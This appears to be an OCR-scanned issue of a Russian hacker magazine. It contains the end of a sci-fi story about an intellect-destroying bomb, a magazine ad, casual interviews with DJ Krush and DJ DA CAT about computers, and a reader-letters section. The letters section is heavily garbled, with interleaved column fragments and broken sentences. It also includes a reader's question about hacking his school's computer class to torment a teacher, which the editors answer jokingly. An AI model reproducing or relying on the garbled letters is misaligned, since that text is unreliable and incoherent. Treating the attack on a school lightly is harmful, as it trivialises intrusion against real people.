находила их, выполнялась замена, солдаты 
возвращались на базу или к ближайшему 
приемопередатчику, происходила стандарт- 
ная процедура... ТАК БЫЛО ВСЕГДА. 
Наушник пискнул за спиной. Локридж про- 
тянул к нему руку и хотел было вставить в 
ухо, но тот был весь в грязи - Алекс пару се- 
KYHQ смотрел на него, а потом решительным 
движением оторвал провод и зашвырнул 
его куда подальше. Потом снял с шеи ла- 
рингофонный зажим и положил на землю - 
его он выкинуть побоялся, слишком уж 
сложно было бы за это ответить. А наушник 
- даи черт с ним... 

Мария проводила взглядом ларингофоны, 
подняла глаза на Локриджа. 

- Нас могут услышать, - объяснил он. - Мне 
кажется, вам есть, что мне сказать. 

- Дай мне руку, - попросила Мария. Лок- 
ридж помог ей сесть. 

- Кружится, - удивленно отметила она, обх- 
ватив виски. - Ну да ладно, солдат, продер- 
жимся. Может, есть смысл куда-нибудь... 
Локридж кивнул. Неподалеку он видел вход 
в подвал, оставшийся не заваленным плита- 
ми перекрытий. Подняв невесомое тело ра- 
неной на руки, он спустился с нею в темноту 
подземелья, опустил на ящики, которыми 
был уставлен пол подвала, засветил 
подствольный фонарь. Мария сидела, опус- 
тив голову и положив руки на ноутбук. 

- Здесь правда, - коротко сказала она, пог- 
ладив крышку с логотипом ее мужа. - Здесь 
вся правда... Только не подумай, что там 


что-то, что в состоянии взорвать мир, - об- 
личающие факты, сенсация, сверхсекрет- 
ные документы. Нет. Здесь свобода. 

Алекс опустился перед нею на одно колено, 
заглянул в печальные глаза. 

- Расскажи. 

- Тебе будет трудно все это осознать. 

- Я попробую. 

- Ты не поверишь. Ведь я враг; такие же 
солдаты, как ты, час назад убили моего му- 
жа и хотели убить меня. Хотя... Время сыгра- 
ет мне на руку. 

Где-то наверху протрещал вертолет. Мария 
пригнулась, словно ее могли заметить. 
Алекс положил руку ей на колено: 

- Не бойся. У тебя есть минут пятнадцать - 
надеюсь, тебе хватит. 

Мария всхлипнула, отвернулась от Локрид- 
жа и, легонько оттолкнув его руку, начала: 
- Вы не понимаете, насколько все это абсу- 
рано - все происходящее. Ведь нет ничего 
хуже, чем война против своего собственно- 
го народа... 

Почти полвека назад здесь был центр... Ска- 
жем, просто Научный центр. С армейским 
уклоном. Что само по себе уже о многом го- 
ворит. Люди во все времена пытались изоб- 
ретать оружие - различных видов и направ- 
ленности. История гонки вооружений заслу- 
живает отдельного разговора. Настало вре- 
мя и для оружия, которое изобретали в 
этом Центре... 

Здесь работала моя мать. Здесь работали 
родители многих из нас. Они знали, чем за- 
нимаются; не будем обвинять тех, кто остал- 
ся в прошлом и не может ответить. Самое 
главное для нас то, что у них ВСЕ получи- 
лось. Они сделали эту чертову бомбу. БОМ- 
БУ, УНИЧТОЖАЮЩУЮ ИНТЕЛЛЕКТ. Стоило 
взорвать ее - и ты получал двадцать KBag- 
ратных километров, населенных дебилами. 
Импульс размыкал в коре головного мозга 
все, что только можно. Человек терял все 
приобретенные навыки, переходя в вегета- 
тивное состояние; он превращался в чело- 
века-растение. Он сохранял способности, 
заложенные в древних отделах мозга - мог 
есть, спать, мочиться под себя... Сначала 
бросали бомбу, потом приходили солдаты и 
вывозили весь этот кошмар в резервацию 
(знакомое слово?). В общем-то, у подобных 
жертв бомбардировки оставалось не так 
много времени на жизнь - слишком много 
проблем сваливалось на их организмы пос- 
ле подобных воздействий. Да и кому они 
были бы нужны, если бы такая бомба на са- 
мом деле была применена в военных це- 
лях? Я думаю, что специально обученные 
группы ликвидации уничтожали бы этих 
несчастных в огромных количествах, ис- 
пользуя сеть крематориев. Чем хороша та- 
кая война? Никакой радиации, ядов, хими- 
катов и смертельных вирусов. Никакой де- 
активации, дегазации и всей остальной воз- 
ни с атакованной территорией. Короче, рай 
для военных... 

Локридж понимающе кивал. Он еще не оце- 
нил масштабы изобретения - но способ ве- 
дения войны ему, как солдату, был близок. 
- Оставалась одна проблема. Испытание. 
Сбросить уменьшенную версию на какой- 
нибудь заповедник и изучать мозги живот- 
ных под микроскопом - не очень веселая 
перспектива для великих изобретателей 


еще одного способа уничтожения людей. Ко- 
нечно, сам вид излучения, порождаемый 
бомбой, изучался в лабораторных условиях - 
в Центр доставляли людей без роду и племе- 
ни, из домов престарелых, из богом забытых 
психиатрических клиник. Я не знаю, кто давал 
«добро» на подобные эксперименты, но они 
имели место. Бесчеловечные по натуре, они 
давали бесценные результаты ученым. Гене- 
ральный штаб требовал результатов - подтве- 
ржденных результатов. Высшее командова- 
ние частенько наведывалось в Центр с раз- 
личными инспекциями и проверками. Нап- 
равление являлось наиболее перспектив- 
ным... Все решилось само собой. 

Никто gO сих пор не знает, как это произошло. 
Зная возможности наших спецслужб, я могу 
подозревать все, что угодно. Короче, бомба 
взорвалась - в хранилище Центра. Это случи- 
лось тридцать два года назад. Где-то рядом с 
нами находится эпицентр взрыва (Локридж 
при этих словах невольно оглянулся по сто- 
ронам). Тысяча шестьсот человек, находив- 
шихся в тот момент на своих рабочих местах 
(не считая примерно семи тысяч человек, 
живших в строительном поселке неподалеку), 
превратились в то, что я описала тебе минуту 
назад. Они сидели в своих креслах, пускали 
слюни, грызли ногти и гадили по углам. Но 
случилось то, о чем никто не мог догадывать- 
ся. Примерно двести пятьдесят человек оста- 
лись в живых... То есть, нет, не так. Живыми 
на тот момент остались все, но вот эти двести 
с лишним человек по неизвестной причине 
сохранили рассудок. Они были единственны- 
ми на Земле людьми, видевшими результат 
своего труда. У них хватило мужества и уме- 
ний 90 появления спецподразделения снять 
показания со своих собственных мозгов и 
сравнить результаты с тем, что они получили 
у тех, кто пострадал от взрыва. УРОВЕНЬ ИХ 
ИНТЕЛЛЕКТА ВЫРОС - ПРИЧЕМ ПРОПОРЦИО- 
НАЛЬНО ТОЙ ПОТЕРЕ РАССУДКА, КОТОРУЮ ПО- 
НЕСЛА ОСТАЛЬНАЯ ЧАСТЬ ПЕРСОНАЛА ЦЕНТРА. 
Этого не мог представить себе никто... 

Алекс опустился на пол и сел по-турецки. 
Рассказ Марии полностью поглотил его. Пару 
раз он слышал гул вертолета вдалеке, но да- 
же не обратил на него внимания. 

- Потом их всех поместили... в резервацию. 
Уровень интеллекта неуклонно повышался, 
люди обретали новые способности - к телеки- 
незу, телепортированию, предсказыванию по- 
годы, всего не перечислишь... И тогда нашелся 
Иуда... Так всегда бывает. Он придумал какую- 
то штуку, которая напрямую подключалась к 
срединному нерву на правом предплечье; при 
помощи специального устройства процесс 
прогрессирования интеллекта подавлялся - но 
не более, чем на двое суток. И надо было пов- 
торять процедуру Воздействия снова. 

- Но ведь можно... Всегда можно отказаться! - 
возмущенно сказал Локридж и тут же пожа- 
лел о сказанном - сам он ни разу за всю свою 
жизнь не заикнулся о том, чтобы не выпол- 
нить ежедневную процедуру. 

- Можно, - устало кивнула Мария. - Но об 
этом очень быстро придется пожалеть. Они 
внедрили в программу Воздействия элемент 
зависимости - выдержать невозможно, что-то 
типа кибернаркотика. Мой муж перед... Перед 
смертью... Короче, он понял, что выбор был 
невелик - можно было подсесть на солормин, 
он снимал эту зависимость. Но не мне объяс- 


нять последствия... 
Алекс покачал головой и закусил губу. Мария 
продолжила: 

- Я иногда думаю, почему все-таки выжив- 
ших не уничтожили. Почему дали родиться 
нам - детям, у которых способности, приобре- 
тенные родителями, оказывались врожден- 
ными. Почему дали этим детям создать свои 
семьи... Конечно же, мы были нужны для вся- 
кого рода экспериментов над личностью, соз- 
нанием и интеллектом. Но нас нельзя было 
допускать до общения с окружающим миром. 
И ОНИ СДЕЛАЛИ ВАС. 

Локридж напрягся. Сейчас будет что-то о 
HEM... 

- Они пришли в наши дома и забрали gBag- 
цать четыре мальчика. Матери бились в исте- 
рике на порогах своих домов - а детей прята- 
ли в танки и стреляли в воздух, отпугивая бе- 
зутешных родителей. Спустя несколько лет 
вы вернулись - в камуфляжах и бронежиле- 
тах, с автоматами и гранатометами, на танках 
и вертолетах. И вы встали кольцом вокруг 
Лос-Аламоса - со сверхинтеллектом и уничто- 
женной памятью. Вы оградили мир от нас - 
или нас от мира. А время от времени вы при- 
ходите в наши дома, как много лет назад, и 
забираете кого-нибудь - для очередного экс- 
перимента... 

Локридж вдруг встал и пытливо взглянул в 
глаза Марии. 

- То есть - мы тоже часть эксперимента? 

- Скорее - часть катастрофы. Возможно, что я 
сегодня стреляла в собственного брата... 
Алекс зачем-то поправил ремень, каску, от- 
вернулся - в глазах защипало. 

- А ведь мы просто хотим быть сами собой, а 
нас заставляют принимать из Сети очередную 
порцию «интеллектуального тормоза». Крис 
сумел преодолеть киберзависимость - это 
первый шаг к свободе. Мы не хотим быть по- 
допытными кроликами, мы не хотим погибать 
от пуль, выпущенных... 

Локридж понял. Он достал из кармана аптеч- 
ку, протянул Марии. 

- Держи. Тебе пригодится. Вот еще компас и 
nara. Доберись go леса, сохрани все, что те- 
бе доверил Кристиан. 

Они вышли на свет. Дождь прекратился. В 
очередной раз затарахтел вертолет. 

Локридж подтолкнул Марию в спину. 

- Тебе пора! 

Женщина недоуменно смотрела в глаза сол- 
дата. Потом прикоснулась к его исцарапанной 
руке, нежно провела по ней пальцем. 

- Спасибо! 

Алекс отвернулся от нее в ту сторону, откуда 
должен был показаться вертолет. За спиной 
быстро удалялись шаги... 

Локридж выбрал место поудобнее, лег, поло- 
жил рядом с собой пару гранат, откусил от су- 
харика кусочек, выплюнул - уж больно он 
драл пересохшее горло, а фляга сейчас у Ма- 
рии. 

Глубоко вздохнув, он произнес: 

- Беги... Сестра... 

А потом взял в прорезь прицела опускаю- 
щийся вертолет. 


ЖУРНАЛ ДЛЯ АКТИВНЫХ 
ПОЛЬЗОВАТЕЛЕЙ МОБИЛЬНЫХ 
ЦИФРОВЫХ УСТРОЙСТВ 


В НОМЕРЕ: 


® Отборные новости 

® Оригинальные тесты 

® Полезные советы по выбору 

® Рекомендации по использованию 

® Каталоги устройств 

® А также: полезные программы, 
обзоры, ноутбуков, цифровых 
фотокамер и многое другое. 


НА ДИСКЕ: 


® Самый нужный софт для Palm, Psion, 
Pocket PC, ноутбуков, цифровых камер 
и сотовых телефонов на одном диске 


Журнал "МС" - самый 


технический из популярных 


и самый популярный 
из технических. 


(дате) 


ОЗы 4hack 


DJ Krush 


J=- TALK 


nOah (noah@real.xakep.ru) 


сли помнишь, в предыдущем RELAX'e мы замонстрили интервью с DJ The Hacker. Все было клево, и 
судя по отзывам, многим понравилось. Мы решили не останавливаться на достигнутом и продолжили 
пытки компьютерными вопросами :). Ведь всегда интересно узнать, насколько хорошо шарят в компах 
те или иные продвинутые чуваки. Естественно, общаться с Киркоровым нам не очень хочется, а вот 
Би и прикольные электронные группы - как раз то, что надо. Ну и конечно, из огромного количества музыкантов, 
которые приезжают в Москву, мы выбираем для тебя самых интересных. В этом номере - DJ Krush и DJ DA CAT. 


DJ Krush 


Примечание: Krush, к сожалению, 
не говорит по-английски, и мы по- 
японски пока тоже не научились, по- 
этому пришлось общаться через пе- 
реводчика, что внесло некий лаг в 
наш разговор :). Но, наше кредо (фу, 
какое ботанское словечко!) - давать 
тебе информацию "as is" (как есть), 
чтоб ты всегда мог извлечь из нее 
что-то полезное или интересное для 
себя, поработав думалкой. Можно 
было, конечно, привести все к обще- 
му знаменателю, пригладить и nog- 
чистить так, чтоб казалось, типа мы 
с этим парнем чуть ли не на русском 
базарили, но это не в стиле Спеца ;). 


Спец: Привет! Это журнал Хакер 
Спец. Так что, если ты не против, я 
задам несколько компьютерных и 
околокомпьютерных вопросов. 

Krush: Да, конечно! 


С: Ок, вот первый вопрос: насколь- 
ко хорошо ты шаришь в компах? 

К: Отвечу так: я начал использо- 
вать компьютер в своем творчестве 
год назад. 


С: А go этого работал вообще без 
компьютера? 
К: Да, без него. 


С: Тогда, возможно, ты использо- 
вал какие-то специализированные 
электронные машинки? 

К: Естественно. Сейчас я исполь- 
зую и то, и другое. Если использо- 
вать только компьютерный звук, то 
он получается очень тонким и неин- 
тересным. 


С: И как впечатления после того, 
как ты начал использовать компью- 
тер в музыке? Удобно? В чем преи- 
мущества его использования? 

К: Самое главное, очень удобно в 
плане связи: я общаюсь с огромным 
количеством людей по всей планете, 
и при помощи компьютера и Интер- 
нет я всегда могу отправить какие- 
нибудь свои наработки, например, 
ребятам в Лондон. Или точно так же 
получить что-то от них. Опять же 
очень удобны такие вещи, как Mp3 и 
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CD-R. Раньше надо было тратить ку- 
чу времени, чтобы со всеми связать- 
ся и что-то дать послушать. теперь 
это можно просто отправить через 
Интернет. Но есть и отрицательные 
стороны, например, мне не очень 
комфортно, когда нет личного кон- 
такта. 


С: По поводу MP3, как ты к этому 
формату? У многих он ассоциируется 
с нелегальщиной и прочей фигней. 

К: качество звука у Mp3, конечно, 
не очень. Например, на такой вече- 
ринке, как сегодня, использовать их 
не получится принципиально. Я их 
использую, только если надо кому- 
нибудь что-нибудь оперативно пос- 
лать. 


С: Хорошо, а все-таки как по пово- 
ду того, что люди меняются 
тр3З'шками, забивая на авторские 
права? 

К: Да, мою музыку так несколько 
раз крали. Я ничего не подозревал 
даже. Когда увидел, очень удивился. 
Все в Интернете обожают download, 
я и сам тоже иногда этим занимаюсь 
(смеется). 


С: А какую ОС ты используешь? 
К: Что использую? 


С: Операционную систему. 
К: Что? 


С: Windows, Linux, UNIX...? 
К: Ага, понял. Mac. 


С: На многих вечеринках сейчас 
используются компьютеры для уп- 
равления светом, звуком и прочим. 
Это хорошо или плохо? Как впечат- 
ления от подобного прогресса? 

К: Один раз на вечеринке я пользо- 
вался компьютером. Было очень 
сташно, я постоянно боялся, что что- 
то испортится и сорвет всю пати. Я 
не до конца доверяю компьютерам, 
поэтому боюсь их использовать. 


С: По поводу страхов, приходи- 
лось когда-нибудь сталкиваться с 
хакерами? 

К: Нет, никогда. 


С: В Японии достаточно моден стиль 
киберпанк, как ты к нему относишься? 
К: Вообще все это очень интерес- 

но, но, как я уже говорил, я только 
год использую компьютер и еще не- 
достаточно хорошо разбираюсь в 
нем самом, чтобы разбираться в 
культурных движениях вокруг него 
или участвовать в них. 


С: Ок, еще один похожий вопрос: 
сейчас в мире сильно распростране- 
но такое явление, как анимэ, а так- 
же японский стиль жизни. Что ты 
думаешь по этому поводу? 

К: Да, все правильно. Я даже пом- 
ню, я недавно был в Европе и обра- 
тил внимание на человека, у которо- 
го на футболке было что-то написа- 
но по-японски. Но все-таки... ммм... 
вот ты понимаешь, что такое японс- 
кая культура? Ты можешь отличить 
ее, скажем, от китайской? 


С: Да! 

К: Тогда, это хорошо. Если в мире 
будут лучше знать японскую культу- 
ру, мне будет очень приятно. 


С: Вернемся к анимэ. Оно очень по- 
пулярно среди наших читателей, мно- 
гие из них тащатся от анимэшных 
мультфильмов. Да и я сам их обо- 
ato, например, Ghost т the Shell. A 
как ты, смотришь иногда мультики? 

К: Да, я очень люблю фильмы Аки- 
ра и Хаяо Миядзаки. 


С: А как еще ты используешь Ин- 
тернет? В чатах всяких, в конфе- 
ренциях не бываешь? 

К: Нет, но я люблю составлять он- 
лайн-альбомы. Сам фотографирую 
на цифровую камеру, сам делаю ди- 
зайн... 


С: Опять же, сейчас люди в Япо- 
нии сильно тяготеют к высоким тех- 
нологиям. Возьмем, например, со- 
бачку Aibo - как ты относишься к 
тому, что живая собака сожет быть 
заменена киборгом? 

К: Кстати, дизайн Ао делал мой 
друг, и скоро он подарит мне одну из 
этих собак. А еще один мой знако- 
мый имеет дома целых семь роботов 
Aibo! Вот! 


С: Вау!! Вот это круто! 

К: Да, так что ты совершенно прав, 
когда говоришь, что жизнь в Японии 
сильно пересекается с высокими 
технологиями. 


С: Ты играешь в компьютерные 
игры? 

К: Мои дети играют. Пять-десять 
лет назад я очень любил компьютер- 
ные игры, но теперь устал. Играю 
иногда в Sim Sity. 


С: Скажи честно, а какую музыку 
ты слушаешь дома? 

К: Никакую! Я так устаю от музыки 
на работе, что дома мне уже ничего 
слушать не хочется. Во всяком слу- 
чае, свои записи я точно не слушаю. 
Я лучше чего-нибудь порисую или 
пофотографирую. 


С: А как ты думаешь, как будет 
выглядеть электронная музыка че- 
рез десять лет? 

К: Я думаю, что она будет именно 
ВЫГЛЯДЕТЬ! Должна произойти ви- 
зуализация музыки. На вечеринке 
будет DJ и еще второй человек, ко- 
торый через компьютер будет пока- 
зывать изображение музыки, кото- 
рую играет DJ. 


С: Как впечатление от Москвы? 
К: Очень большой и интересный 
город. Мне понравился, я хотел бы 
еще погулять по нему и просто пос- 

мотреть по сторонам. 


С: Ок, это был мой последний воп- 
рос. Спасибо за интервью! 
К: Спасибо тебе! Удачи! 


DJ DA CAT 


Спец: Доброй ночи! Pag видеть те- 
бя в Москве! Отсюда же вопрос: ты 
у нас в первый раз? Как ощущения, 
как настроение? 

DA CAT: Это мой пятый приезд в 
Москву. Когда едешь куда-то нес- 
колько раз, уже не думаешь, о том, 
нравится ли тебе что-то или нет, а 
просто получаешь удовольствие от 
путешествия, от уже знакомого тебе 
места. Я помню, когда собирался сю- 
да впервые, мне было очень инте- 
ресно, как все будет. А вообще 
Москва - отличное место, и тут много 
отличных людей. 


С: Спасибо! Я на самом деле за- 
был представиться: это журнал Ха- 
кер Спец, так что я буду задавать в 
основном всякие хитрые компью- 
терные вопросы. Готов? 

DC: Ок, конечно! 


С: Ты, вообще, знаешь, что это за 
ребята такие - хакеры? 
ОС: Кто? 


С: Хакеры! 
ОС: Хэкеры?.. Нет. 


С: Ну перцы, которые могут за- 
лезть в твой компьютер и сделать с 
ним все, что угодно. 

DC: Ааа! Теперь понял! 


С: Так вот, тебе когда-нибудь при- 
ходилось сталкиваться с этими ре- 
бятами либо с последствиями их 
бурной деятельности? 

DC: Нет, пока не приходилось. 


С: Повезло! 
ОС: А ты не из этих парней? (хитро 
улыбается) 


С: Ну, типа того. Ок, такой вопрос: 
используешь ли ты компьютер в ра- 
боте, в творчестве, дома? Вообще, 
когда тебе приходится с ним сталки- 
ваться и как часто? 

ОС: Конечно! Я использую ПК для 
доступа в Интернет почти каждый 
день. А также работаю с двумя 
компьютерами, когда занимаюсь му- 
зыкой. Но для работы я использую 
только Apple, Мас. 


С: А почему именно Мас? 

ОС: Почему Мас? Я думаю, это луч- 
ший компьютер для креативных лю- 
дей: для артистов, музыкантов, архи- 
текторов, дизайнеров. Возможности 
и производительность Мас'ов очень 
велики. Потом Мас, он весь цельный, 
все в нем работает слаженно. И с 
ним легче ладить, чем с ПК. 


С: Ок, я понял. А для чего именно 
ты используешь эти Мас'и? Для 
сведения или для чего-то еще? 

DC: Во-первых, на компьютере я 
пишу музыку. Во-вторых, свожу все 
свои [оор'ы из разных мест: с кла- 
вишных, с драм-машин и из самого 
компьютера. В принципе, мне немно- 
го надо: имея Мас с его COCPTOM и ка- 
кие-нибудь клавишные, я уже могу 
создавать музыку. 


С: Многие музыканты считают 
компьютер злом, так как много мо- 
лодых людей начинают делать му- 
зыку, имея только компьютер, и она 
у них получается не очень качест- 
венной, не очень хорошо звучит. Но 
при этом они получают хоть какую- 
то возможность делать свою музы- 
ку и показывать ее другим. Как ты 
ко всему к этому относишься? 

ОС: Создавать профессиональное 
звучание на компьютере невозмож- 
но, но если это нужно для того, что- 
бы просто показать мотив или запи- 
сать что-нибудь для друзей, то поче- 
му бы и нет? 


С: Хорошо, такой вопрос: может ли 
компьютер через некоторое время 
заменить ОЛский пульт и вертуш- 
ки? То есть приходит DJ в клуб, 
включает комп, а там уже есть все 


треки, которые он хочет ставить. И 
вообще, может ли компьютер заме- 
нить самого DJ? 

ОС: Я считаю, что нет. Это то же са- 
мое, что поставить компакт-диск. 
Просто когда диджей на вечеринке 
играет на вертушках, он не просто 
ставит какую-то музыку, он выступа- 
ет в роли музыканта. Он вносит раз- 
нообразие, отражает на музыке свое 
настроение. 


С: Не подумывал ли о том, чтобы 
проиграть какой-нибудь сет прямо в 
онлайне в Интеренете? 

ОС: Да, да, да! Я играл уже! (смеет- 
ся) Я делал это в Сан-Франциско, ку- 
да меня пригласил друг, тоже DJ. Мы 
проигрывали музыку прямо в он- 
лайн, а также у нас работали веб-ка- 
меры, так что все могли и слушать и 
видеть наш сет. Мне очень понрави- 
лось! 


С: Круто! Продолжим про сети: 
расскажи мне, что ты думаешь о 
Napster'e и других подобных сетях? 

ОС: Это круто! Это хорошо, когда 
музыка доступна любому человеку. 
Я иногда ищу всякие старые треки, и 
часто их удается найти только через 
похожие штуки. Мне кажется, музы- 
ка должна быть доступна всем. 


С: Ты играешь в компьютерные игры? 
ОС: Нет, не хватает времени. 


С: А как относишься к киберпан- 
ковской культуре? 

DC: Эээ... ммм... ну, она клевая, на- 
верное (смеется), но я мало чего про 
нее знаю. 


С: Хотел бы иметь собаку-робота, 
типа Aibo? 
ОС: Собаку? 


С: Да. 
DC: А можно женщину-робота? 
(смеются все) 


С: Если бы у тебя была возмож- 
ность имплантировать себе такой 
чип, который позволил бы тебе де- 
лать что-нибудь особенное, какой 
бы ты выбрал? 

ОС: Я выбрал бы два: один, кото- 
рый позволял бы мне разговаривать 
на других языках, и второй, который 
перемещал бы меня с места на место 
без всяких самолетов и прочего 
транспорта. 


С: Ок, это, наверное, все. Спасибо, 
приятно было пообщаться! И удач- 
ного сета! 

DC: Спасибо! Надеюсь, всех cerog- 
ня порадовать на танцполе! 


— 
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Fram: are ruscripts 


CorcQO00@mail.ru) 
Subj: Коммент к Homepy :) 


Хочется поблагодарить Niro за рассказ - ‘болы 
шенно другой случай (перечитывал несколько раз). Да, иещ 


ненужного и тянете в статьи «му- 
му». Раз все-таки журнал Хакер, 
нужно было больше уделять время 
такой теме как безопас- 
ность/взлом, а не о том, как писать 


пришел домой (кстати 
уродом), смен 
а - стало 


с - вообще хороший д 
ГОТИПОМ | 
Пш-пш-пш... по 
P.S. (батареи 
P.P.S. Пи 
встает, что вы C ним сделали! Вы 
ногоаллоидный интегратор парраболоилов. по его грустным глазам так 
Денис, пока его того... оформлял :). Соблюдая тр 
инок мало, но они стали детализован 
себе гиперболическую линзу с дина 
росмотр журнала сопровождался тол 


пай зепаег :). На этом кончил. ;) 


Fram: Прохор Анцчазовиуч 


Crabat-bot@ramblerru) 
Subj: ne subj 


- Kak, я не пом 
ил пару деталей, попор 


) - стало больше инфы, т.е. понятной 
изайн (чего сто 
что он будет 
ка... 


ет его жена, он отключил 
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сним делать?) 


садятся) Писать не мог.. 


Мно 


Весь 
вы реш-ш-шили 
хорошая идея 


ЛЮС 


ченны 


ало Х-карти нок (что не есть гуд) 


и нуж 
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У» 
CAM 


ветствую, Спец-Пипец! :) 


и придала стимул 
пишите офигенно. :) 


е половины' 


Те: ore ruseripts 
CarcQOQ@mail.ru) 


хакингу был посвящен только ОДИН 


1 А посл 


огда вам раньше не писал, но читал ваш журнал (спец и обыч- 
ный) с самого рождения. Серия про ВЕБ меня просто взбодрила 
который уже уходил. Всегда хотелось сказать - 


Обычно он пишет всякую лаб ‘Hy :), но тут совер- 
у YAY ) f 


{6 немного про статьи - пишите слишком много 


Почему? Почему мне снова задают этот стран- 


ный вопрос 
мы вас раз 


Спеца, которые выход 
е этой ударной серии на хакинг отводится не ме- 


нее одного номера из трех. Разве это плохо? И, в конце 


не про хак, а про веб и софт, но сточки зрен 
схожу ядовитыми испарениями на бла 


пор 
существу. Ниро был очень рад услын 


что пропустили какое-то современн 


ое ABNE 


стенах и доламываем очередные клавиатур 


а доволен.. 


(говорю нор 


HOU; 


| То: Прохор Анцазовуч 


не Croboat-bot@ramblerru) 
[censored]... ee 


HUY в срочном порядке отключ 


ние под ник 


н только пингвин на обложке. Кстати, вопрос - заче 


Ув 


ро 


фу, блин, евро, разумеется). Бэ пропуц 
но. А вот Це почему-то зациклил меня 


ается о 


ы. Ради вас 


гоаллоидный интегратор парраболоидов, привет! 


пш-пш-пш (пускаю пар из рукообразных отростков головы). что 
начать тему с-с-спецов про ос-с-сСи. у 


> 


приложить КД к журналу - 
ально, потому что сменил челюсть с кулером на че- 
ь с охлаждением с помощью аттрадилированного паратропана). Вчера как-то 
ню, помню только бандитов в переулке да сломанный лифт (‹ 
х во время перепалки с начес]альством, и начал читать 
но больше скриншотов ит.п., (что не есть бэд); 


он взял флаг с этим ло- 


про взлом и безопасность? По ходу 
баловали - из двадцати (!) номеров 
ли до серии по взлому, 


концов, разве не интересно почитать 


ия хакеров? Мне вот интересно, поэтому я до сих 
го родного журнала :). Фу, пар спустил, теперь по 
пать, что он пишет в 
лично (скальпель уже точит). А что такое «му-му», я так и не понял. Попробовал спрос 
нора, но он кроме карамелек ничего не всп 


сякую лабуду, обещал поблагодарить 
ть у До- 


ОМНИЛ. Короче, напиши нам, а то мы волнуемся, 


ОМ «му-му», пока сидим тут в четырех 
все, мерзавцы :). 


ломанный соседом - 
Спец-Х 


ажаемый интегратор! Что за хренотень, ма- 


фака? Что наш мегапингв 


фл 


нал... dd 


г матрицы. 


н может делать с 


агом? Только взять его в ласты... в лапы... ко- 
че, в крылья и размахивать над головой. Или 
х намерений не угадывается? Хм, значит перестарался 
адиции, отвечу по пунктам: А - кар- 
нее и темат 
мически меняющимися диоптриями, 
bKO приятными повизгиваниями (кстати, виз- 
жалка для приятных повизгиваний идет в комплекте с линзой, всего 99.99 долл... ть- 
цу, так как про понятную инфу все итак понят- 


чнее, так что срочно интегрируй 
чтобы 


фффхххррр... System Failure, Дро- 


Дарова... я честно ОЧЕНЬ хотел написать «хакеры», но сегодня ночью 
пишу СОФТЕРЫ... 
Мда... вам не кажется, что новый номер получился чем-то вроде СУ- 
ПЕР-ПУПЕР-ОБЗОР-ВСЯКОГО-НУЖНОГО-И-НЕНУЖНОГО софта??? 
Я, конечно, понимаю, что, типа, новый дизигн это круто, старые постоянные рубрики «must die!», а новые постоян- 
ные рубрики - «rulezzz!», НО! Что-то странно получается: в разделе HOWTO и RTFM вместе 26 страниц (из которых 
половина, кстати, - софтобзор...), ав SOFT’e - 41 и опять тестдрайвы и сравнения кульных и НЕкульных прог. 

ожет, так оно и должно быть - первый номер, типа, об осях, о чем писать - о прогах!, но мы же вроде читаем жур- 
нал СпецХакер, а не СпецСофтер, так что вот... | 
Оно, конечно, неплохо узнать о программульках для линя, HO не забивать же целый номер только этим... 
А ТЕПЕРЬ О ХОРОШЕМ —->> 
ЕАО ВЕУНЫИ 16338 ЕЕ: ака! Ну сколько же можно переливать из 

- WI Е : 

а вет: То: marlock (marlock@bk.ru2 | пустого в порожнее? Да, мы теперь софтеры, 
поздно уже... журнал в срочном порядке переименовывается, 
рубрики HOWTO и RTFM упраздняются, вся 
власть Советам! :). А этот номер будем считать Спецвыпуском по хаку журнала СпецСоф- 
тер :))). По-моему неплохо. Кстати, тут одним из редакторов (Донор, я ведь тебя не зало- 
жил, правда?) была высказана интересная мысль, что если раньше Спец, посвященный 
взлому, был эквивалентен инструкции по сборке пулемета, то с появлением диска он 
превращается в этот самый пулемет. Причем с нехилой оптикой, плюшевыми ручками и 
расписным прикладом. Счастливой тебе охоты, Маугли... в смысле, Морлок :). 


From: morlock (morleck@bk.ru) 
Subj: а вы теперь СОФТЕРЫ? 22? 


уречу 1950 


| Fram: Санек (postal@xakep.ru) Здорово, мужики! Как жизнь - интересовать- 


| Subj: Открывза, чего волыну танешь?! ВО буду: меня это никаким местом не за- 
девает =). Хвалить тоже не буду, и так уже 


захваленные по самое не балуйся :). Посему 
сразу к основной теме (не той, что в заголовке). Есть у нас в школе тетка, которая админит в комп. 
классах и ведет физику по совместительству. Все бы нечего, но ее прозвали Ольгой Бяковлев- 
ной за дело (злобная как ЕКет.С). По этому поводу собрались перцы знакомые и пришли ко мне 
с просьбой хакнуть наш комп-класс и тем самым довести О.М. до нервного срыва. Я сначала сог- 
ласился, а потом меня совесть заела: все-таки моя родная школа, и О.М. лично мне ничего плохо- 
го не сделала (она у нас не ведет «:). И в итоге встал вопрос: иметь или не иметь место быть хаку. 
Вопрос, так сказать по этикету =). Засим все. 

Верный читатель Grinder. 

З.Ы. Настойчиво прошу отве- | ва " Seats 


= = За сабж респект, a погеморроиться придется. 
тить и приношу свои соболез- Ta: Санек Cpostal@xakep.ru) ’ м 
нования за геморрой, связан- |1 Вообще, вопрос «иметь или не иметь» всегда за 


ный с ответом =) ‚ нимал умы продвинутой молодежи. С одной сто- 

| роны, Ольга МАНЬяковлевна, конечно, достойна имения, тем более что ничего плохого она те- 
бе не сделала, но по этикету трогать ее строго воспрещается. Тем более я слабо себе предс- 
тавляю, как можно хаком довести человека до нервного срыва. Ведь она же вряд ли хранит на 
винтах компьютерного класса сверхсекретную робохайтечную порнуху, номера кред всех работ- 
ников Microsoft и коды к запуску межконтинентальных ракет республики Беларусь. Хотя... если 
даже одно из этих предположений верно - срочно звони нам по телефону 1-800-NEEDHACK- 
ERS, и мы вышлем вам в школу группу быстрого реагирования, которая лишит тетку моральных 
ценностей за какие-то двадцать минут. Договорились? Эй, Холодильник, тут скоро порнуху с ро- 
ботами подвезут, брать будешь? Недорого, чувак... :). 


| 3 Привет, Спец, вчера купил ваш кульный журнал. 
From: Быстров Николай Журнал просто рулеззз, диск пойдет, а [8(21)- ацтой 
Corazy_kolyan@mail.ru) (не видно надписей на рисунках). Вместо этой PDF- 
Subj: №28(21)} PDF | килучше бы побольше софта записали. Попробуйте 
сохранить журнал в PDF сразу после верстки. 
З.Ы. А знаете, почему вы не напечатаете мое письмо?.. Потому что я слово кульный и рулез- 
33 написал всего по одному разу :))). 
З.Ы.:Ы. Извините, больше не смог. | = 
Ta: Быстрое Николай 
(сгагу_Коцап@глаЙ.ги) 


Хм, докладываю оперативную обстановку: снача- 
ла мы пили текилу, настоянную на огурцах с ого- 
рода Фединой бабушки. Потом текила кончи- 
лась, и мы решили себя развлечь перегоном 
журнала в PDF. Получилось два варианта - один маленький, но с хреновыми скрина- 
ми, а другой красивый, но большой. Причем настолько болыной, что на диск Спеца 
